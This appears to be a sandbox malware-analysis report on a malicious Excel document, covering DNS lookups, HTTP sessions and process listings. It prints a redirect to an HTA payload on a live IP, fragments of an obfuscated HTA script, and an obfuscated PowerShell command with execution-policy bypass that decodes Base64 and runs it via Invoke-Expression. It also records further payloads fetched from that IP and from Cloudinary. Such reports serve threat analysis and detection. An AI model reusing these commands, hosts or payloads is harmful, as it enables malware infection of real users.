Dec 10, 2024 06:58:27.234561920 CET | 8.8.8.8 | 192.168.2.22 | 0x159c | No error (0) | cloudinary.map.fastly.net | | 151.101.65.137 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:27.234561920 CET | 8.8.8.8 | 192.168.2.22 | 0x159c | No error (0) | cloudinary.map.fastly.net | | 151.101.193.137 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:27.640626907 CET | 8.8.8.8 | 192.168.2.22 | 0xdd08 | No error (0) | res.cloudinary.com | cloudinary.map.fastly.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 06:58:27.640626907 CET | 8.8.8.8 | 192.168.2.22 | 0xdd08 | No error (0) | cloudinary.map.fastly.net | | 151.101.65.137 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:27.640626907 CET | 8.8.8.8 | 192.168.2.22 | 0xdd08 | No error (0) | cloudinary.map.fastly.net | | 151.101.193.137 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:27.640626907 CET | 8.8.8.8 | 192.168.2.22 | 0xdd08 | No error (0) | cloudinary.map.fastly.net | | 151.101.129.137 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:27.640626907 CET | 8.8.8.8 | 192.168.2.22 | 0xdd08 | No error (0) | cloudinary.map.fastly.net | | 151.101.1.137 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:28.493438005 CET | 8.8.8.8 | 192.168.2.22 | 0x323b | No error (0) | paste.ee | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:28.493438005 CET | 8.8.8.8 | 192.168.2.22 | 0x323b | No error (0) | paste.ee | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:28.627326965 CET | 8.8.8.8 | 192.168.2.22 | 0x323b | No error (0) | paste.ee | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:28.627326965 CET | 8.8.8.8 | 192.168.2.22 | 0x323b | No error (0) | paste.ee | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:28.761075974 CET | 8.8.8.8 | 192.168.2.22 | 0x323b | No error (0) | paste.ee | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:28.761075974 CET | 8.8.8.8 | 192.168.2.22 | 0x323b | No error (0) | paste.ee | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:28.998879910 CET | 8.8.8.8 | 192.168.2.22 | 0x323b | No error (0) | paste.ee | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:28.998879910 CET | 8.8.8.8 | 192.168.2.22 | 0x323b | No error (0) | paste.ee | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:29.133102894 CET | 8.8.8.8 | 192.168.2.22 | 0x323b | No error (0) | paste.ee | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:29.133102894 CET | 8.8.8.8 | 192.168.2.22 | 0x323b | No error (0) | paste.ee | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:46.206413984 CET | 8.8.8.8 | 192.168.2.22 | 0xa1cd | No error (0) | paste.ee | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:46.206413984 CET | 8.8.8.8 | 192.168.2.22 | 0xa1cd | No error (0) | paste.ee | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:46.340930939 CET | 8.8.8.8 | 192.168.2.22 | 0xa1cd | No error (0) | paste.ee | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:46.340930939 CET | 8.8.8.8 | 192.168.2.22 | 0xa1cd | No error (0) | paste.ee | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:46.474672079 CET | 8.8.8.8 | 192.168.2.22 | 0xa1cd | No error (0) | paste.ee | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:46.474672079 CET | 8.8.8.8 | 192.168.2.22 | 0xa1cd | No error (0) | paste.ee | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:46.608483076 CET | 8.8.8.8 | 192.168.2.22 | 0xa1cd | No error (0) | paste.ee | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:46.608483076 CET | 8.8.8.8 | 192.168.2.22 | 0xa1cd | No error (0) | paste.ee | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:46.742235899 CET | 8.8.8.8 | 192.168.2.22 | 0xa1cd | No error (0) | paste.ee | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:46.742235899 CET | 8.8.8.8 | 192.168.2.22 | 0xa1cd | No error (0) | paste.ee | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
                                                                                            • short.ruksk.com
                                                                                            • res.cloudinary.com
                                                                                            • 172.245.142.60
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49164 | 172.245.142.60 | 80 | 3312 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 06:57:44.376657963 CET | 402 | OUT | GET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1
                                                                                            Accept: */*
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: 172.245.142.60
                                                                                            Connection: Keep-Alive
Dec 10, 2024 06:57:45.530473948 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                            Date: Tue, 10 Dec 2024 05:57:45 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                            Last-Modified: Mon, 09 Dec 2024 08:34:12 GMT
                                                                                            ETag: "304ff-628d23aa8f80d"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 197887
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/hta
                                                                                            Data Ascii: <script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2527%25253C%252521%252544%25254F%252543%252554%252559%252550%252545%252520%252568%252574%25256D%25256C%25253E%25250A%25253C%25256D%252565%252574%252561%252520%252568%252574%252574%252570%25252D%252565%252571%252575%252569%252576%25253D%252522%252558%25252D%252555%252541%25252D%252543%25256F%25256D%252570%252561%252574%252569%252562%25256C%252565%252522%252520%252563%25256F%25256E%252574%252565%25256E%252574%25253D%252522%252549%252545%25253D%252545%25256D%252575%25256C%252561%252574%252565%252549%252545%252538%252522%252520%25253E%25250A%25253C%252568%252574%25256D%25256C%25253E%25250A%25253C%252562%25256F%252564%252579%25253E%25250A%2525
                                                                                            Dec 10, 2024 06:57:45.530720949 CET224INData Raw: 33 43 25 32 35 32 35 35 33 25 32 35 32 35 36 33 25 32 35 32 35 35 32 25 32 35 32 35 34 39 25 32 35 32 35 35 30 25 32 35 32 35 37 34 25 32 35 32 35 32 30 25 32 35 32 35 37 34 25 32 35 32 35 35 39 25 32 35 32 35 37 30 25 32 35 32 35 36 35 25 32 35
                                                                                            Data Ascii: 3C%252553%252563%252552%252549%252550%252574%252520%252574%252559%252570%252565%25253D%252522%252554%252545%252578%252574%25252F%252576%252562%252573%252563%252572%252569%252570%252554%252522%25253E%25250A%252564%252549%2525
                                                                                            Dec 10, 2024 06:57:45.530735016 CET1236INData Raw: 34 44 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                                                            Data Ascii: 4D%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                                                            Dec 10, 2024 06:57:45.530744076 CET224INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                                                            Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                                                            Dec 10, 2024 06:57:45.530755997 CET1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                                                            Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                                                            Dec 10, 2024 06:57:45.530766964 CET1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                                                            Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                                                            Dec 10, 2024 06:57:45.530778885 CET1236INData Raw: 32 35 34 44 25 32 35 32 35 36 32 25 32 35 32 35 34 32 25 32 35 32 35 37 38 25 32 35 32 35 36 39 25 32 35 32 35 34 31 25 32 35 32 35 36 39 25 32 35 32 35 34 32 25 32 35 32 35 36 39 25 32 35 32 35 35 41 25 32 35 32 35 34 33 25 32 35 32 35 36 38 25
                                                                                            Data Ascii: 254D%252562%252542%252578%252569%252541%252569%252542%252569%25255A%252543%252568%25256C%252571%25256B%252543%252567%252543%252559%252562%252543%252555%252573%252556%252567%25254F%252564%25254F%252545%252571%252558%252565%25256E%252553%252555%
                                                                                            Dec 10, 2024 06:57:45.530790091 CET1236INData Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                                                            Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                                                            Dec 10, 2024 06:57:45.530812979 CET1236INData Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                                                            Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                                                            Dec 10, 2024 06:57:45.530833006 CET1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                            Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                            Dec 10, 2024 06:57:45.650151968 CET1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                                                            Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49166 | 172.245.142.60 | 80 | 3592 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 06:57:49.039467096 CET | 479 | OUT | GET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Language: fr-FR
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Range: bytes=8896-
                                                                                            Connection: Keep-Alive
                                                                                            Host: 172.245.142.60
                                                                                            If-Range: "304ff-628d23aa8f80d"
Dec 10, 2024 06:57:50.178848028 CET | 1236 | IN | HTTP/1.1 206 Partial Content
                                                                                            Date: Tue, 10 Dec 2024 05:57:49 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                            Last-Modified: Mon, 09 Dec 2024 08:34:12 GMT
                                                                                            ETag: "304ff-628d23aa8f80d"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 188991
                                                                                            Content-Range: bytes 8896-197886/197887
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49167 | 172.245.142.60 | 80 | 3716 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 06:57:57.078409910 CET | 392 | OUT | GET /466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIF HTTP/1.1
                                                                                            Accept: */*
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: 172.245.142.60
                                                                                            Connection: Keep-Alive
Dec 10, 2024 06:57:58.218962908 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                            Date: Tue, 10 Dec 2024 05:57:58 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                            Last-Modified: Mon, 09 Dec 2024 08:27:27 GMT
                                                                                            ETag: "25960-628d22283020e"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 153952
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: image/tiff


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49173 | 172.245.142.60 | 80 | 1972 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 06:58:12.088566065 CET | 514 | OUT | GET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Language: fr-FR
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            If-Modified-Since: Mon, 09 Dec 2024 08:34:12 GMT
                                                                                            Connection: Keep-Alive
                                                                                            Host: 172.245.142.60
                                                                                            If-None-Match: "304ff-628d23aa8f80d"
Dec 10, 2024 06:58:13.226474047 CET  275  IN  HTTP/1.1 304 Not Modified
                                                                                            Date: Tue, 10 Dec 2024 05:58:13 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                            Last-Modified: Mon, 09 Dec 2024 08:34:12 GMT
                                                                                            ETag: "304ff-628d23aa8f80d"
                                                                                            Accept-Ranges: bytes
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.22  49163  54.150.207.131  443  3312  C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp  Bytes transferred  Direction  Data
2024-12-10 05:57:43 UTC  405  OUT  GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1
                                                                                            Accept: */*
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: short.ruksk.com
                                                                                            Connection: Keep-Alive
2024-12-10 05:57:44 UTC  505  IN  HTTP/1.1 302 Found
                                                                                            Date: Tue, 10 Dec 2024 05:57:44 GMT
                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                            X-DNS-Prefetch-Control: off
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                            X-Download-Options: noopen
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 0
                                                                                            Location: http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
                                                                                            Vary: Accept
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 125
                                                                                            Connection: close
2024-12-10 05:57:44 UTC  125  IN  Data Ascii: Found. Redirecting to http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1  192.168.2.22  49165  54.150.207.131  443  3592  C:\Windows\System32\mshta.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-10 05:57:48 UTC  429  OUT  GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Language: fr-FR
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: short.ruksk.com
                                                                                            Connection: Keep-Alive
2024-12-10 05:57:48 UTC  505  IN  HTTP/1.1 302 Found
                                                                                            Date: Tue, 10 Dec 2024 05:57:48 GMT
                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                            X-DNS-Prefetch-Control: off
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                            X-Download-Options: noopen
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 0
                                                                                            Location: http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
                                                                                            Vary: Accept
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 125
                                                                                            Connection: close
2024-12-10 05:57:48 UTC  125  IN  Data Ascii: Found. Redirecting to http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
2  192.168.2.22  49169  54.150.207.131  443  3312  C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp  Bytes transferred  Direction  Data
2024-12-10 05:58:07 UTC  405  OUT  GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1
                                                                                            Accept: */*
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: short.ruksk.com
                                                                                            Connection: Keep-Alive
2024-12-10 05:58:07 UTC  505  IN  HTTP/1.1 302 Found
                                                                                            Date: Tue, 10 Dec 2024 05:58:07 GMT
                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                            X-DNS-Prefetch-Control: off
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                            X-Download-Options: noopen
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 0
                                                                                            Location: http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
                                                                                            Vary: Accept
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 125
                                                                                            Connection: close
2024-12-10 05:58:07 UTC  125  IN  Data Ascii: Found. Redirecting to http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
3  192.168.2.22  49172  54.150.207.131  443  1972  C:\Windows\System32\mshta.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-10 05:58:11 UTC  429  OUT  GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Language: fr-FR
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: short.ruksk.com
                                                                                            Connection: Keep-Alive
2024-12-10 05:58:11 UTC  505  IN  HTTP/1.1 302 Found
                                                                                            Date: Tue, 10 Dec 2024 05:58:11 GMT
                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                            X-DNS-Prefetch-Control: off
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                            X-Download-Options: noopen
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 0
                                                                                            Location: http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
                                                                                            Vary: Accept
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 125
                                                                                            Connection: close
2024-12-10 05:58:11 UTC  125  IN  Data Ascii: Found. Redirecting to http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
4  192.168.2.22  49174  151.101.1.137  443  3832  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-10 05:58:28 UTC  127  OUT  GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                                                                                            Host: res.cloudinary.com
                                                                                            Connection: Keep-Alive
2024-12-10 05:58:29 UTC  754  IN  HTTP/1.1 200 OK
                                                                                            Connection: close
                                                                                            Content-Length: 2230233
                                                                                            Content-Type: image/jpeg
                                                                                            Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
                                                                                            Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
                                                                                            Date: Tue, 10 Dec 2024 05:58:29 GMT
                                                                                            Strict-Transport-Security: max-age=604800
                                                                                            Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                            Server-Timing: cld-fastly;dur=121;cpu=120;start=2024-12-10T05:58:29.181Z;desc=hit,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)"
                                                                                            Server: Cloudinary
                                                                                            Timing-Allow-Origin: *
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Accept-Ranges: bytes
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                                            x-request-id: 6f487a4c60d72621f2efeecff85ca20a



                                                                                            Target ID:0
                                                                                            Start time:00:57:19
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                            Imagebase:0x13fb50000
                                                                                            File size:28'253'536 bytes
                                                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:4
                                                                                            Start time:00:57:44
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                            Imagebase:0x13f9a0000
                                                                                            File size:13'824 bytes
                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:00:57:50
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'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'+[CHaR]0X22+'))')))"
                                                                                            Imagebase:0x4acc0000
                                                                                            File size:345'088 bytes
                                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:00:57:50
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'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'+[CHaR]0X22+'))')))"
                                                                                            Imagebase:0x13f4b0000
                                                                                            File size:443'392 bytes
                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:00:57:50
                                                                                            Start date:10/12/2024
